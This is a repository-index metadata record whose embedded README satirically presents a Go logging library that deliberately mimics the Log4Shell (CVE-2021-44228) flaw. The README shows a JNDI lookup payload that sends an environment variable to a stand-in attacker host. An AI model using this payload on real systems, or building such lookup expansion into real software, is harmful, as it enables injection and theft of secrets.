{"id":16884767,"url":"https://github.com/bradfitz/jndi","last_synced_at":"2025-09-22T22:24:50.765Z","repository":{"id":45478924,"uuid":"437184933","full_name":"bradfitz/jndi","owner":"bradfitz","description":"a irresponsibly bad logging library","archived":false,"fork":false,"pushed_at":"2021-12-11T19:36:00.000Z","size":3,"stargazers_count":268,"open_issues_count":3,"forks_count":1,"subscribers_count":5,"default_branch":"main","last_synced_at":"2025-03-31T03:09:07.075Z","etag":null,"topics":[],"latest_commit_sha":null,"homepage":null,"language":"Go","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/bradfitz.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null}},"created_at":"2021-12-11T04:14:34.000Z","updated_at":"2024-06-14T11:55:07.000Z","dependencies_parsed_at":"2022-07-14T18:47:12.549Z","dependency_job_id":null,"html_url":"https://github.com/bradfitz/jndi","commit_stats":null,"previous_names":[],"tags_count":0,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/bradfitz%2Fjndi","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/bradfitz%2Fjndi/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/bradfitz%2Fjndi/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/bradfitz%2Fjndi/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/bradfitz","download_url":"https://codeload.github.com/bradfitz/jndi/tar.gz/refs/heads/main","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":252771494,"owners_count":21801721,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":[],"created_at":"2024-10-13T16:30:32.312Z","updated_at":"2025-09-22T22:24:45.729Z","avatar_url":"https://github.com/bradfitz.png","language":"Go","funding_links":[],"categories":[],"sub_categories":[],"readme":"# an irresponsibly bad logging library\n\nIs [CVE-2021-44228](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44228) making you feel left out as a Go programmer?\n\nFear not. We can fix that.\n\nI wouldn't use this package, but if you want to...\n\n```go\npackage main\n\nimport \"github.com/bradfitz/jndi\"\n\nvar logger = jndi.NewLogger()\n\nfunc main() {\n\t//...\n}\n\nfunc handleSomeTraffic(r *request) {\n        logger.Printf(\"got request from %s\", r.URL.Path)\n}\n```\n\nCongrats, the user actually wrote `${jndi:ldap://attacker.example/${env:${lower:u}ser}}` and\nthe logger expanded your environment variable and sent it over the network\nas a side-effect of logging.\n\n## Inspiration\n\nI saw https://twitter.com/_StaticFlow_/status/1469358229767475205 and thought it'd\nbe fun to write an expander while I was bored, stuck in transit.\n\n## Bugs\n\nThis package is incomplete. log4j actually does a bunch more:\n\n* https://logging.apache.org/log4j/2.x/manual/configuration.html#PropertySubstitution\n* https://logging.apache.org/log4j/2.x/manual/lookups.html\n\nPatches welcome to help flesh this package out. We've got some\ncatching up to do.\n\n## Apologies\n\nIn case you're seeing this on GitHub and not via Twitter, I acknowledged\nthat this is questionable taste: https://twitter.com/bradfitz/status/1469523985998118925\n\nIn general I believe in the whole `#hugops` thing. I had a CVE filed against\nmy own code just the day before: https://twitter.com/bradfitz/status/1469015417679081472\n\nIt happens. I joke to cope.\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fbradfitz%2Fjndi","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fbradfitz%2Fjndi","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fbradfitz%2Fjndi/lists"}